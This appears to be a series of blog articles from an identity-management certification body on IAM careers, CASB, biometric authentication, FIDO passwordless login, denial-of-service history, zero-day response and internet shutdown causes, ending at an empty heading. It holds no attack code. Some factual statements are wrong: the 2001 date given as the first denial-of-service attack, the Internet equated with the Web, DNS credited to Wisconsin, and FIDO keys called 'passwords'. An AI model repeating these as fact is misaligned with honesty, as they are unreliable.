According to a Verizon investigation, more than 4 billion digital records were exposed in the first half of 2019 alone. Most breaches that involved hacking were due to weak or compromised user credentials. Most hacks occurred at the password level.

Is identity and access management part of IT or cybersecurity? As cybercrime became more frequent and more sophisticated, IAM gradually became a distinct discipline with a wider gap from IT.

With cloud technology, mobility and remote jobs on the rise, information technology professionals have less control over workers’ access to sensitive data. Even worse, the sprawl of user identities often extends to partners, contract workers, customers and vendors.

User groups at various levels need their own set of requirements and restrictions. Not only that, but users are signing in from a range of devices such as smartphones, laptops and tablets. Every time a user logs in, onboards, offboards, resets a password or changes jobs within a company, sensitive data is put at risk.

That’s where identity and access management, or IAM, comes in. This highly specialized offshoot of IT focuses more narrowly on cybersecurity.

IAM professionals primarily ensure that only authorized programs, users and devices are connected to one another. They manage ever-changing user identities as users come and go. They authenticate all users and allow or disallow access at every point of entry. When employees leave a company, credentials are immediately removed.

IAM systems even create behavior baselines to reflect typical usage. For instance, if a location or device is out of the ordinary for a specific user, IAM notices.

In short, IAM provides an extra layer of security that no business, large or small, can function without these days. Worldwide, cybercrime costs are expected to reach $6 trillion annually through 2021. Businesses are vulnerable to monetary theft, theft of intellectual property, data destruction, personal identity theft, fraud, a damaged reputation and a host of other evils.

There are other benefits in addition to enhanced security. A centralized IAM platform saves time, man-hours and costs because it’s all automated. Administrators don’t have to manually grant permission each time a user wants to access a database, network or application.

Also, governments and industries are getting stricter all the time with security and privacy regulations. IAM enforces policies and closely monitors compliance, which could save companies millions of dollars in fines.

For all those reasons, more and more businesses are creating IAM teams. Skilled IAM professionals are in hot demand.

IT or Security?

In its infancy, IAM was usually a small, specialized department functioning under the overall IT strategy. IAM team members traditionally reported to the chief information officer.

As cybercrime became more frequent and more sophisticated, IAM gradually became a distinct discipline. The gap between IT and IAM seems to be getting even wider.

Many longtime IT professionals are simply not trained in the cutting-edge technology, engineering, software development and security improvements that are vital to strong IAM.

In big corporations that can afford a larger security staff and a chief security officer, IT directors have less and less to do with identity strategies. Many IT departments these days have no ownership at all over IAM, and IAM employees report to the CSO.

CSOs are more intimately familiar with internal controls requirements, threat and risk management processes, and cybercrime prevention strategies. CIOs are typically more outward-facing, technology focused, and less concerned with security than a CSO would be.

In smaller companies, the lines get somewhat blurrier, and who reports to whom really depends on how things are structured. Some smaller firms merge two executive jobs; CIO and CSO become CISO, or chief information security officer.

At any rate, IAM largely functions under the security category.

A Fast-growing Career With Diverse Opportunities

It’s estimated that half a million specialists are needed in the cybersecurity sector. That’s just in the U.S.

Unlike other specialized fields, such as nuclear medicine or aerospace engineering, IAM has opportunities across countless sectors and industries. Who doesn’t need first-rate cybersecurity?

Every day, IAM is being designed and implemented for medical settings, banks, universities, government agencies, real estate firms, insurance companies, human resources departments, software companies and retail stores. Businesses from startups to major corporations seek top talent.

That gives job seekers in IAM numerous choices that they wouldn’t have in other fields.

Jobs in IAM

There are both technical and nontechnical jobs in this burgeoning field.

Strong technical skills are needed in system design, architecture and engineering; implementation; database and operating system management; system integration; software development; and programming.

Nontechnical jobs include project planning and management, risk assessment, identity management training, compliance, auditing, data analysis, advisory and consulting.

These are some of the most popular jobs:

  • System architect
  • System engineer
  • Administrator
  • Access control specialist
  • Data protection specialist
  • Identity protection adviser

Most require a bachelor’s degree with a focus on higher education in a computer-related field, and job-specific certifications. A strong background in IT is a great launching pad for technical IAM roles, however, nontechnical IAM professionals such as governance experts, auditors, risk managers, process re-engineering staff, compliance professionals, data protection officers, and identity theft protection advisors also contribute greatly to the IAM field with their diverse professional background and experience.

There are enough jobs to go around at just about every level, and salaries range anywhere from $35,000 to $200,000. IAM is an ideal career for creative types with extensive computer knowledge.

Identity and Access Management Certifications

Identity Management Institute offers distinct identity management certifications for each set of inter-related IAM roles listed above and others. Click below to learn more.

Identity and access management certifications

Cloud computing has allowed companies and their employees to easily store, access, share, and work with others across the globe and within different geographical areas. In today’s digital world, almost 96% of organizations leverage cloud solutions to support their day to day business operations. However, conducting business in the cloud requires a different cybersecurity approach for ensuring data security than traditional network security methods. Cloud Access Security Broker (CASB) offers a solution to ensure security of applications and data in cloud environments.

Cloud Access Security Broker (CASB) is a cloud security solution that helps organizations control access, reinforce policies, and protect data in the cloud.

What Is CASB?

CASB is on-prem or cloud-based security software that sits between businesses and cloud service providers. It enforces compliance, security, and governance policies for cloud services. CASB involves several security policies, such as single sign-on, authentication, authorization, device profiling credential mapping, and encryption. Moreover, you can apply other strategies, including alerting, logging, tokenization, malware detection, and prevention to further expand on cybersecurity capabilities.

The term CASB was coined by Peter Firstbrook and Neil MacDonald of Gartner company in 2011. However, the company published the industry’s first quadrant in the year 2017.

CASB Purpose

Cloud access security broker is an essential aspect of cloud security. It is crucial for companies that want to have secure cloud usage in their enterprises. Since its inception, CASB services have evolved to work with other IT security services and support IT operations such as monitoring the cloud service usage for budgeting purposes.
If you are using cloud services, it is critical that you consider incorporating CASB as part of your cybersecurity strategy. With proper CASB deployment, you can easily add other security controls to protect your data as it moves between devices and cloud service providers. Although CASB is not mandatory for all businesses, it is critical for maintaining security as cloud usage grows and acts as default solution for security compliance including privacy regulations such as the General Data Protection Regulation (GDPR).

CASB Services

CASB offers four primary security services, including visibility, compliance, data security, and threat protection. Before settling for a specific CASB solution, ensure that it meets your needs in these categories.

Visibility
It is essential to know who is using cloud services and for what purpose. With that said, most companies with cybersecurity teams and capabilities are lacking visibility in this area. With CASB services, an organization can monitor both authorized and unauthorized cloud access by employees and others. Initially, companies allowed their employees only to use their work computers to access cloud services. However, increasingly workers are allowed to connect their personal devices like smartphones to access the organization’s cloud services. CASB can effectively monitor cloud activities and raise alerts.

Compliance
Compliance with data privacy laws is very crucial because privacy is the most significant right of consumers. Therefore, even a minor violation can lead to a lawsuit. As a regulated company, you need auditing and reporting tools to show data security compliance. CASB solutions provide Data Loss Prevention (DLP) and other policy controls that enforce various compliance requirements including HIPAA, PCI, and many more.

Data security
With various data stored in the cloud, CASB identifies and categorizes some as sensitive, thereby applying appropriate Data Loss Prevention policies like tokenization, encryption, or data masking for added protection. Even when the information is downloaded, the encryption stays on to prevent data exfiltration. CASB provides access control for the browser, operating system, location, IP address, and device.

Threat Protection
Another crucial function of CASB is protecting cloud services from unsanctioned applications. It does this through behavior analytics in real-time and anomaly detection. With new threats, effective protection is introduced such as anti-phishing protection, predictive malware technologies, and account-takeover detection.

Benefits of CASB

Identifying unauthorized access
Security is a requirement for any organization. Although many employees and organizations prefer various devices from different locations to access cloud services, this capability involves high-security risks. With limited security solutions such as a firewall-only solution, data cannot be adequately protected from threats. Comprehensive CASB solutions resolve this by scrutinizing and protecting data from unauthorized devices and potential threats.

Access control
CASB monitors cloud security by offering full visibility for every user’s behavior in real-time. It further neutralizes the issue by taking necessary action in case of a threat.

Reporting
Aside from acting as a cloud security gatekeeper, CASB reports any suspicious activities. It is also practical in auditing and reporting organizations’ overall operations, hence improving their security structure. By monitoring traffic on cloud services, management can be on the lookout for policy violations.
If your company possesses confidential data and leverages cloud services for data sharing and storage, then the CASB solution is necessary in providing absolute control over data.

CASB Deployment Methods

The primary function of CASB is to provide control and visibility over data and potential threats within an enterprise’s cloud. There are three principal methods to deploy CASB:

  • Reverse proxy: This method is used on user devices without certificate installation or configuration changes. They don’t cover unauthorized cloud usage adequately.
  • Forward proxy: This manages all traffic from endpoints, including those from unsanctioned cloud services. However, they don’t manage user-owned gadgets.
  • API mode: It works well with consumer-owned devices and further allows organizations to perform functions such as policy visibility and control, logging, and data security inspection in a cloud service. Although it does not have any single point of failure, not all cloud services support API support.

CASB Implementation Considerations

When an enterprise wants to use CASB, there should be a governance workflow to help streamline the implementation of the new cloud services, improve IT in managing cloud services of the company, and minimize the risk of data loss.

Below are the steps of CASB implementation:

Getting Visibility to The Existing Cloud Usage
When CASB is introduced to the current cloud usage of a company, it analyzes web traffic logs while comparing the data to their cloud registry. This stage provides visibility in all company’s cloud services and the associated risks.
When looking for CASB solutions, enterprises should ensure that the CASB has a comprehensive cloud registry for maximum visibility. Also, the companies should ensure that CASB tokenizes sensitive data like IP addresses and user ID before uploading any web traffic logs for analysis.

Building A Cloud Risk Model
CASB provides detailed insight in every cloud service by maintaining and updating their complete signatures regularly. A robust cloud risk model consists of a comprehensive and accurate CASB, with attributes verified by an industry’s authority.

Applying The Risk Model to The Existing Shadow Cloud Service
This is the stage where a company now uses CASB to enforce acceptable use policies. IT can classify files in categories such as permitted/ approved/denied from the risk assessment provided in the first stage. From there, CASB introduces preventive measures to the existing firewall.

Developing A Cloud Service Onboarding Process
With the implemented cloud risk model, a company can use CASB in streamlining their onboard process for the new cloud services. This process dramatically reduces the work of the IT department since they rely on CASB to grant or deny access to cloud services.

What Are The CASB Policies and Standards?

Here are three central policies that most CASB solutions offer, depending on your needs and industry:

Access Control
CASB offers a range of variables to manage access control in a managed vs. unmanaged device. Access by an unmanaged device presents a higher risk than an authorized device. As a result, access to an unmanaged device must be more restricted. The restricted access of unsanctioned devices helps in cloud security by eliminating a potential threat that comes with it. CASB can block sensitive information from being accessed by unauthorized users in real-time.

Mobile Data Protection
The biggest problem facing organizations is what happens to sensitive data when it is synchronized or downloaded by thousands of employees’ devices, either authorized or unauthorized. CASB ensures that your mobile cloud data is safe by providing security functions like encryption, PIN codes, right management when downloading data, and selective wiping of corporate data.

External Sharing
If a company’s cloud apps contain a sharing component, CASB solution looks for sensitive data, scans it, and identifies any external shares. All publicly shared files that contain credit card data or other sensitive personal data can be quarantined until an evaluation is done to ensure the share is required and legitimate.

Final Remarks

CASB has rapidly evolved to become a necessity in cloud security management in any industry that leverages cloud services to store and share data. CASB solutions are increasingly deployed in numerous leading enterprises to provide visibility, data control, compliance, and threat protection.

Identity and Access Management blog, articles, news, analysis and reports
Visit our blog to read other articles.

Hackers have become bolder and more sophisticated than ever before. Millions of business entities worldwide, both big and small alike, have fallen victim to malware and ransomware attacks with devastating results. This, coupled with the risk for escalating attacks in the foreseeable future, is prompting companies to switch to bio-metric authentication technology.

Biometric authentication for better security keeps hackers at bay and users happy. This case study makes the argument for transition to biometric authentication.

This article will review companies’ transition to bio-metric authentication technology in detail. Most importantly, it will help you make the decision whether or not to switch to a biometric authentication for better security.

How Many Companies Have Transitioned?

Several studies confirm that majority of companies have already transitioned to bio-metric authentication technology. One such study conducted in 2018 by Spice-works reported that about 62% of companies had already transitioned to the technology towards the end of 2018. The report further estimated that 90% of all companies would transition to the technology by the end of 2020.

Different companies have adopted varying methods of bio-metric authentication. Available methods range from basic fingerprint scans to sophisticated AI-powered behavioral analysis, and it seems that most companies have opted for the simpler methods, according to multiple reports.

Fingerprint scanning is the most popular method of bio-metric authentication, and it is currently in use by 57% of all respondents. Facial scanning and recognition come second with a general usage rate of about 14% of all respondents. Other biometric authentication methods in use include:

• Hand Geometry Recognition (5%)
• Iris Scanning Technology (3%)
• Voice Recognition (2%)
• Palm-Vein Recognition (2%)

It is worth noting that these bio-metric security measures are not sufficient to guarantee impenetrable security, considering the statistics. Cyber-security experts have warned that certain forms of bio-metric security are vulnerable to attacks – already, more than one million people have had their fingerprints and facial recognition data compromised.

Still, it is worth noting that the bio-metric authentication form of security is considered the safest and most secure. Following is an overview of why this is the case.

Making a Case for Bio-metric Authentication for Businesses

There is a reason why so many companies have transitioned to biometric authentication in such a short period: because they trust it to keep hackers at bay. That’s not all – following is an overview of some of the top reasons for the mass transition to bio-metric authentication:

1. Accuracy

Bio-metric security is the most accurate form of digital security yet. It makes use of personal physiological traits that are hard to duplicate, unlike passwords and PIN numbers that anyone can access and use without detection.
For example, fingerprint scanning, which is considered one of the basic methods of bio-metric authentication, is highly accurate because no two fingerprints are alike. The stakes are raised when it comes to other forms of biometric authentication, such as iris scans and AI-powered behavioral recognition.

So, why do some reports suggest that many people have had their biometric data compromised? First, some biometric security systems are better than others. Second, laxity in other security components can give hackers the opportunity to steal sensitive cyber-security data.

2. Efficiency

In addition to better security, bio-metric authentication systems also make it easier to streamline operations in various sectors of the company. For example, employees with the relevant authorization can get easier and quicker access to different parts of the building without having to swipe access cards every time. Additionally, the extra component of activity tracking also makes it easier to collect performance data and calculate payroll.

3. Accountability

As mentioned, one other key component of biometric authentication security is tracking activities. For example, the system can track when employees check in and check out, how much work they turn in, their turnaround times, and more. All of this data helps to gauge employees’ productivity and hold them accountable. It also comes in handy when formulating a strategy to ensure efficiency around the workplace and ultimately improve overall productivity.

3. Convenience

Operating based on a biometric authentication system is easier and more convenient for everyone involved. Consider employees; for example, it is common for employees to lose or forget their access cards or passwords. In such cases, the employees have to go through extensive security checks to regain clearance, a process that takes up a lot of time and other resources. This is not the case with biometric authentication since the defining security clearance traits are physiological.

Biometric authentication systems are also convenient for employers and the people responsible for security. These systems, despite their complex nature, are easy and quick to implement. Some training is required, but most of the controls are intuitive and easy to understand.

4. Scalability

Biometric authentication systems are scalable in more ways than one. For example, you can use different versions of the system for different purposes. This applies to companies with a large workforce with varying security clearances. In this case, you can use simple facial and fingerprint authentication systems for low-level clearance access and reserve the more complex methods for high-level clearance access.

More importantly, biometric authentication systems are designed to grow with the company’s growing needs. The system is powered by AI and digital technologies, so the potential for expanding is great. Your company will not need to install additional components in case it needs to clear more employees, at least not as much as compared to conventional security systems.

5. Cost-Saving & Profitability

As mentioned, you don’t need to buy or install additional components when upgrading your biometric authentication security system. The system also requires less maintenance compared to alternative conventional security systems. As such, you will be looking to save substantial costs in the long run. The security assurances that come with this system will also prevent potentially significant losses in case of a successful breach of security.

Implementation – The Process and Common Challenges

Biometric authentication is a much simpler concept today than it was in the past. Installation and implementation of these systems, however, is a topic best left to trained technical experts. At a glance, however, it is a two-phase process.

First, the technicians will come in and install all the necessary hardware: this basically includes sensors, cameras, scanning devices, and screens, depending on the extent of your security system. The second phase involves the installation of the necessary software to power the system. This coincides with the collection of users’ biometric data, such as taking fingerprints, making iris scans, and modeling personal behavioral traits.

The process is not as smooth as it sounds, however, as some challenges may arise during installation and implementation. Common documented challenges include:

1. Legal Hurdles

Biometric security systems have some serious implications for privacy and regulatory compliance in some states and countries. In the U.S., for example, several states, including Texas, Illinois, California, New York, and Washington, have certain privacy laws that will hamper the full implementation of biometric security systems in the retail sector.

2. Data Breach Threat

Biometric authentication is highly accurate when properly implemented and used. However, it relies on stored data, just like every other security system. This data has to be stored somewhere, and it is vulnerable to hacking when in storage; as mentioned, hackers have already demonstrated that they can do it.

3. Potential for System Failure

Biometric authentication security systems are characterized by efficiency, but they can also fail in case the central power source gives out for any reason. The implications for such a situation would be immense, and they would potentially disrupt all operations; this is why it is advisable to have a back-up or fail-safe security program in place.

What Do Users Have to Say?

The public has embraced biometric authentication security rather well. Several research reports, including by Ipswitch and Veridium, report that majority of people prefer biometric security to conventional forms of security. The poll by Veridium reports that about 40% of consumers are already using fingerprint reader technology, and another 52% are willing to transition to some form of biometric authentication.

The poll also reveals that 80% of all respondents believe that biometric security is more secure than the common alternatives. However, security is only one of the reasons why more people are switching. According to the poll, 35% of respondents prefer biometric systems because of their speed and 33% because of their convenience.

Millions of smartphone users around the world have already adopted biometric authentication measures for their mobile devices; the two popular authentication methods are fingerprint scanning using an in-build scanner and facial recognition software using the phone’s camera and a secondary application. Homeowners are also installing these security systems because of the added security they promise; not to mention the convenience of not having to carry your keys everywhere.

Transitioning Out of Necessity

If the recent worldwide hacking attacks have taught us anything, it is that hackers will not relent. As a business, transitioning to biometric authentication security systems should not be an option that you shelve – now is the time to do it before hackers initiate another attack and hold your systems hostage.

There is nothing to lose – implementation is easy, the systems are user-friendly, and you will save a lot of money in the long run and enjoy the security assurances you need to forge ahead.

Identity and access management certifications

Passwords are among the least costly security mechanisms for applications and systems. They are usually free and built into many information technologies. They are easy to use and technical staff are familiar with how to set them up. While passwords are better than having no authentication mechanism at all, they have significant flaws which will be discussed.

The Fast Identity Online or FIDO standard is a joint development by the world’s leading technology companies which try to strengthen the security of systems on mobile devices and applications through strong authentication.

In 2018, an estimated five million hacked passwords were on sale on the Dark Web. Passwords are among the most common cybersecurity problems. They are often easy to break which allows unauthorized users to access business information and systems, employee e-mails, consumer accounts, and other online platforms. “123456” and “password” continue to be the two most utilized passwords, demonstrating a widespread disregard for security by many Internet and system users.

Complex Password Challenges

For passwords to be effective and serve their intended purpose, they must include characters, numbers, and symbols which in itself is a major problem. While creating complex password is easy, being able to remember such passwords is often difficult or impossible. Users who are frustrated with constantly resetting their forgotten passwords finally give in and create a simple password that they can remember and use across many systems which is welcome by hackers who are looking for easy ways to breach systems.

Using Passwords Across Multiple Systems

As mentioned, another problem is that people often reuse passwords across multiple websites and systems. Therefore, a data breach at one organization can have a ripple effect impacting security across other websites and social media platforms. People are often susceptible to phishing schemes whereby cyber criminals pose as legitimate organizations and institutions and ask users to provide them with log-in credentials.

Password Cracking

Password cracking technology has also become more sophisticated allowing people to crack passwords quicker. In 20 years, the average length of a password is projected to increase by two characters, while computing power is expected to increase exponentially. Currently, 54% of passwords are only three to six characters in length, making them easy targets for cracking. This is driving the push to find alternative methods of authentication.

Default Passwords

Too many people are using default or common passwords that were programmed into the device or application leaving them vulnerable to cybercriminals. For every twenty passwords, one is being shared with another person or multiple users. Retaining default passwords can jeopardize the cybersecurity of an entire organization or business.

Additionally, while it is helpful that password expirations are becoming more common, people are often reverting their passwords to minor variations on previously used passwords. Therefore, it creates a false sense of security especially when there is a history of data breaches and people create slight changes to existing credentials.

What is the FIDO (Fast Identity Online) Standard?

The Fast Identity Online or FIDO standard is a joint development by the world’s leading technology companies which try to strengthen the security of systems, mobile devices and applications through strong password-less authentication. FIDO passwordless authentication allows users to leverage the standard to sign in to their platform or system without a username or password using an external security key or platform key built into a device. FIDO aims to replace the use of susceptible password for authentication with more secure biometric authentication reinforced by encryption.

The biometric systems that FIDO plans to utilize include fingerprints and facial recognition. This will be combined with second-factor and multi-factor authentication which will provide layers of verification which will be far more difficult to break. The integration of these two authentication alternatives will provide an easier and more secure way to identify authorized users.

How does FIDO Fast Identity Online Work?

When users become members of a platform, application, or system that uses FIDO, the system creates cryptographic keys, so that the private password remains on the device, while the public password is registered on the online platform or system. To verify one’s identity the user demonstrates that they have the private password through a challenge such as a mathematical verification.

The private password can only be entered if the user has unlocked the local device or the hardware of the device they are using. This can be done through voice, a secure PIN inserting a second-factor device or, a fingerprint. This process protects the user’s credentials and privacy, providing more security with minimally invasive techniques. The standard does not provide data that can be used by applications and platforms to track user activity. Biometric information is also never shared, remaining on the user’s local device.

Why Use FIDO Instead of Passwords

FIDO authentication standards are based on public-key cryptography which provides authentication that is more secure than passwords. Additionally, consumers and workplaces are gaining increased security without placing time barriers on the user experience. People are finding FIDO authentication standards easier to use while platforms and applications are easier to manage. It reduces the likelihood of accounts being hacked, and reduces the likelihood that a single data breach will affect multiple systems and organizations.

FIDO Alliance Members

The FIDO alliance members are comprised of technology leaders from around the world including the government, healthcare companies, telecommunications companies, and corporations. The alliance is driven by the mission to find alternatives to passwords and reduce reliance on their usage. These diverse partners work together to develop common standards, collaborate on establishing best practices for FIDO authentication, and generating global awareness of the benefits of adhering to FIDO standards. A full list of board-level members, sponsor level members, government members, and associate level members is available on the Fido Alliance’s website.

FIDO Authenticator

To meet FIDO standard requirements, authentication providers are required to be certified in at least one of the three certification levels. Currently, those three levels are level 1 and 1+, level 2 and 2 +, and level 3 and 3+. At each successive level, the requirements build from the previous level. Therefore, level 2 must meet the requirements for level 1 in addition to unique requirements. For example, level 1 FIDO authenticators must defend against phishing plus server credential breaches. Level 2 must meet all level 1 requirements as well as defend against device OS compromise.

The FIDO alliance is currently working on software and hardware requirements for additional levels beyond level 3+. There is a stringent process by which vendors can demonstrate if their implementation of FIDO standards meets the FIDO authenticator requirements. At the end of the process, qualified vendors can receive a FIDO certification.

The Benefits of FIDO Authentication

The pros of FIDO are that it provides strong security, has a range of secure recovery options, and is resistant to phishing attacks. Fido passwordless authentication is secure because it cannot be redirected or intercepted due to the challenge and security key requirements. FIDO also allows users to register multiple devices on the service provider that they work with. Finally, phishing attacks are ineffective since they are sent through a URL link or e-mail attachment and FIDO enabled tools and keys only work with the URLs that the user has registered. Some have suggested that adopting FIDO authentication may be costly and going through the process wastes time. However, the benefits that are gained in terms of security as opposed to traditional passwords authentication is a game-changer.

Identity and access management certifications

There has never been a successful cyber attack that crashed the entire internet at once. That’s not to say that it can’t happen in the future, but as of yet, hackers have only been able to bring down portions of the internet at once.

Cyber Attack Methods on Internet Availability by Identity Management Institute

Denial-of-service attacks are among the most common cyber attacks on the Internet availability that hackers use to shut down portions of the internet. They involve having someone, or multiple people, send fake login attempts and other such functions to create a “wall of virtual people” that blocks legitimate users from accessing a website, portal, or critical web app.

The first of these kinds of attacks occurred in 2001 when Microsoft suffered corrupted DNS paths. Before the 9/11 attacks, tens of thousands of machines shut down in July under the Code Red Worm, named because the hackers happened to be drinking Code Red Mountain Dew at the time. A month later, Code Red II hit and infected tens of thousands more.

After the 9/11 attacks, the government established the National Cyber Security Alliance to combat hackers at their level. The Bush administration created the Department of Homeland Security in June of 2002, and part of its mission was to boost security at critical IT sectors.

As is usual with these battles, the hackers are always one step ahead, creating new forms of attack faster than the defenders can devise counters. Even in 2020, when cyber counter-terrorism is at its apex, Amazon suffered the largest denial-of-service attack in history. The hackers flooded Amazon with 2.3 Tbps. Amazon, however, was prepared, and the company’s IT forces successfully parried the attack! This is rare, though, and the hackers generally have the upper hand.

Despite the hackers’ advantage, the reason that these attacks have not yet been able to crash the entire internet is that the internet is colossal. Additionally, the internet is not one single network. It’s made up of thousands of different networks that all talk to one another. Even the most skillful team of hackers cannot possibly affect all of these networks at once using today’s tools. Each network has its own characteristics and defense strategies. While it’s not that difficult to affect one network, you can easily see that it is impossible to affect the entire thing at once with present technology.

Any such disruption of service will last as long as the hackers can keep up the denial-of-service pressure, until the attacked party responds to the attack. Hackers have other options, though. Although the prospect of “bringing down the whole thing” is enticing, they’ve shifted tactics toward crashing networks of businesses and governmental entities with dire consequences.

They will infect machines with malware that propagates itself. They disguise evil intentions in a computer version of “woves in sheep’s clothing” and entice people to click on the bad links. These attacks are far more sophisticated than the Anna Kournikova virus from two decades ago. Fortunately, computer users in the 21st century are savvier than their counterparts from the dawn of the dot com boom. Even the least experienced of them have basic security on their machines. In the world of espionage, the spies call their craft “the greatest of games.” The hackers and defenders might disagree, however.

Identity and access management certifications

While most malware attacks and hacking can be addressed with up to date security software solutions such as antivirus products, there are some vulnerabilities that are not addressed immediately creating an opportunity for successful attacks. Zero day attacks take advantage of security flaws in a program that developers either don’t know about or have not yet addressed. For an unprepared developer or software vendor, a successful zero day attack can be catastrophic, resulting in leaked data, stolen assets, or a loss of customer trust. Though these sorts of attacks are impossible to anticipate and hard to address, there are zero day attack prevention practices and security vulnerability management strategies that developers and software owners can use to limit the damage.

Zero day attacks take advantage of security flaws in a program that the developers either don’t know about or have not yet addressed.

Detecting a Zero Day Attack

In most cases, developers won’t have a chance to stop a zero day attack before it happens. If there’s a vulnerability in the code of their program that they don’t know about, they likely won’t know about it until the attack has already occurred. For this reason, it is important that application owners stay on top of known vulnerabilities and fix them as soon as possible.

Zero day attacks can be detected by monitoring network activity when possible and watching for irregularities. Artificial intelligence tools can be used to automatically keep an eye on network traffic and notify system owners of unusual activity.

Specific Strategies: Efficient Patch Management

Containment is arguably the most important step an incident response plan, as it prevents further damage from spreading following an attack. At the heart of containing an incident is patching the flaw that allowed the attack to occur in the first place. The sooner that patch is deployed, fewer losses will be sustained.

In order to patch a flaw as quickly as possible without disrupting workflow, patches can be outsourced to custom software providers. This process can even be partially automated, so that as soon as a breach is identified, a request to identify and patch its source is immediately placed. Large enough organizations might consider maintaining a dedicated team to patch any bugs or flaws as they are identified.

Zero Day Exploit Prevention

Though zero day attacks are by definition nearly impossible to prevent once a flaw exists, there are methods by which an organization can limit the number of zero day exploits they are affected by.

First, organizations must thoroughly test systems and software before they are put into active use, and to hire white hat hackers to probe security so that any vulnerabilities are discovered and patched before release. There are times when certain project timelines won’t allow for software testing to occur before release. In these situations, all efforts must be made to test the system as soon as it is in use.

Another method to avoid a zero day attack is to prevent a discovered exploit from being released onto the market. When a hacker discovers a flaw, they have the choice to either report it to the developer, or to sell it to a dark net broker. By incentivizing hackers to report their findings directly to the developer, that developer can preempt an actual attack. A developer might offer a reward for any flaws that are discovered, though this also feeds into the economy of exploit trading, and rewards malicious activity.

Though file signature identification techniques won’t work on a zero day attack until after it’s been identified, if the owners of the first system affected by a particular attack strategy identify and report the program’s signature, attacks on other systems can be prevented.

Specific Strategies: Next Generation Antivirus

Next generation antivirus, or NGAV, is useful for preventing and responding to zero day attacks in ways that traditional antivirus cannot. Because traditional antivirus services identify threats only as new files are introduced to the system, zero day attacks using macros, remote logins, or those manipulating system memory are invisible to them. Next generation antivirus instead records and analyzes events that happen within a system to detect unusual behaviors. This makes it a powerful tool to detect and respond to zero day attacks, and possibly prevent some from taking full effect.

Responding to a Zero Day Attack

No software is immune to zero day attacks, so it’s essential to have a zero day policy in place to thwart attacks, and to ensure that all team members managing a system are familiar with that policy. A good zero day policy will mitigate damage, minimize the vulnerability exploit window, and ultimately patch the flaw that may allow an attack to occur and be successful.

The six step incident response protocol outlined by the SANS institute provides a good outline around which an effective policy can be built. The six steps are as follows:

  1. Preparation:
    This step should be performed before an incident even occurs, and should be updated along with any major software changes. It involves creating a list of all the assets that might be at risk from an attack, such as networks and servers. This list of assets should be prioritized according to which are most important to protect.
    After finishing prioritization, a list of possible incidents should be created. Any attacks that seem likely to occur should be planned for, and guidelines should be put in place for who to contact in the event of each one.
  2. Identification:
    Once a security breach has been detected, as much information as possible must be collected about it. What flaw did it exploit? What was its objective? Is it continuing to spread? Collect all the data provided by security tools and analyze it.
  3. Containment:
    The attack’s entry point must be sealed off. The flaw that was identified in the previous step should be patched as quickly as possible. If possible, stop any remnants of the attack from spreading farther than they already have by temporarily closing off the connections between infected systems and those that are yet to be affected.
  4. Eradication:
    Any remaining activity resulting from the attack needs to be stopped. The threat may have spread between systems, and will need to be removed from any that have been affected.
  5. Recovery:
    Return the affected systems to normal operations. If data was stolen or a third party was otherwise harmed, they must be notified.
  6. Lessons Learned:
    In this step, the incident is analyzed. Was the response to the attack effective? Where did it fall short, and how could it have been improved? How could similar attacks be prevented in the future, or at least dealt with more quickly?

Which Strategies are Right for Your Organization?

Some of the strategies listed above are absolutely essential for any organization, such as creating a policy for preventing zero day attacks and responding to zero day incidents. The more expensive strategies, such as NGAV or automating and outsourcing patch management, won’t be feasible for smaller organizations, and might not fit into limited budgets. Whether it’s wise to use them depends on what is at stake in the event of a successful attack. If millions of dollars could be lost, or millions of lives affected, then every possible step to avoid zero day dangers should be taken.

Identity and Access Management blog, articles, news, analysis and reports
Visit our blog to read other articles.

There are imminent threats facing the Internet and online communications which can lead to the internet shutdown, disruption to internet-based communications, and damage to internet-connected devices. Human error, government intervention, and cyberattacks are among the top causes.

Internet Infrastructure Disruption Causes

According to Access Now, there were at least 213 incidents of internet shutdowns in 2019 around the world which is an increase from 196 internet incidents in 2018 and 106 in 2017. In many countries, government ordered internet shut downs have become the “new normal.” Although governments around the world cause forced Internet shutdowns and disruptions in many cases to silence critics, consequences of cyberattacks to control or damage internet-connected machines are unimaginable.

In early 2020, it was reported that Israel launched a cyberattack on the Iranian nuclear site which caused a huge fire damage, and in response, Iranians launched a counterattack on the Israeli water supplies to increase the amount of chlorine entered into the drinking water which could have made a big part of the population sick if the attack was not thwarted.

Before diving further into scenarios involving internet shutdown, lets understand what the Internet is and how it works.

The Internet Infrastructure

Internet is a broad term for a network of globally interconnected computers communicating with one another. The Internet (interconnected networks) is also referred to as the World Wide Web. The Internet has existed since 1969 which has gradually developed from four host computers to millions of computer systems. Although no one owns the Internet per se, a non-profit group by the name of Internet Society was formed in 1992 to monitor and maintain the Internet.

The internet structure comprises of many networks interconnected with one another. Access to the extensive network is managed by a group of network service providers (NSP) which sell Internet backbone access or bandwidth to internet service providers (ISP) which usually access the NSPs network access points (NAPs). These providers work with one another to exchange packet traffics. Each Network Service Provider requires a connection to at least three Network Access Point (NAPs). The NAPs packets might jump from one NSP backbone to another NSP backbone.

The Internet Service provider (ISP)

If you have a computer at home or workplace, then you probably have an internet connection. To access the Internet and other computers in the network, you must get connected through an internet service provider (ISP). Most companies have their points of presence (POPs) connecting them to various regions. A POP is the point where users can access the network. ISPs are connected through Network Access Points (NAPs).

To access the Internet, you need a computer along with:

  1. A modem
  2. A telephone line for dial up access or cable line
  3. An Internet browser and ISP connection software
  4. An internet Service Provider (ISP) account

Modem

A modem also called “modulator-demodulator” is a hardware component that connects your home device, computer or network to the Internet.

Router

A router connects your home computer and other IoT devices to each other. Routers also act as the Internet cops controlling flow of data packets and communication from one computer to another. Routers protect one network from the other. They ensure that all computers with internet access can connect safely.

IP Address

Every machine or device using the Internet has an identifying number. This number is the IP Address. IP stands for internet protocol which is a pre-defined requirement for communication over the Internet. An IP address typically looks like this; 216.27.61.137. These numbers refer to the Octets, the Net, and Host.

Domain Name System (DNS)

Wisconsin’s university created the domain name system in 1983. It’s a system that automatically maps text names to the IP address. That way, you only need to remember the name. An example of DNS is www.google.com corresponding to an IP address such as 173.194.39.78

Internet Shut Down Causes

Human error, government intervention, and cyberattacks are significant causes of internet disruption globally. Despite many security measures in place, hacking attempts still cause significant damage. One of the ways hackers attack is by targeting a system with denial -of- service attacks which makes the system or website unavailable.

Human Error in Network Disruptions

Human error is a factor in network outages. It is estimated that at least 25% of the network disruption is caused by human error. The following is a list of errors made by humans:

  • Change management – When network changes are not tested properly; it leads to a network outage in 44% of cases.
  • Manual dependence – most IT teams manage how the network is generally designed and operating. However, a mistake on their part will lead to a network outage.
  • Resolution time- How long do IT experts take to repair faulty Internet connection? Several reports indicate they take too long to respond, hence more extended periods of an internet outage.

Internet Hacking and Cyber Attack Methods

